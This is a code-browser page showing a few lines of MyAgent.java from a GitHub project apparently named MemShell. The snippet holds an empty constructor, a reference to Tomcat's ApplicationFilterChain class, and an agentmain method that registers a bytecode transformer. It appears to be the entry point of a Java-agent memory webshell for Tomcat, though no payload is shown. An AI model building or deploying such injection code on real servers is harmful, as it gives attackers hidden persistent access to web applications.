MCPcopy Create free account
hub / github.com/ax1sX/MemShell / MyAgent

Method MyAgent

TomcatAgent/src/main/java/com/agent/MyAgent.java:13–14  ·  view source on GitHub ↗
()

Source from the content-addressed store, hash-verified

11 public static String ClassName = "org.apache.catalina.core.ApplicationFilterChain";
12
13 public MyAgent() {
14 }
15
16 public static void agentmain(String args, Instrumentation inst) throws Exception {
17 inst.addTransformer(new MyTransformer(), true);

Callers

nothing calls this directly

Calls

no outgoing calls

Tested by

no test coverage detected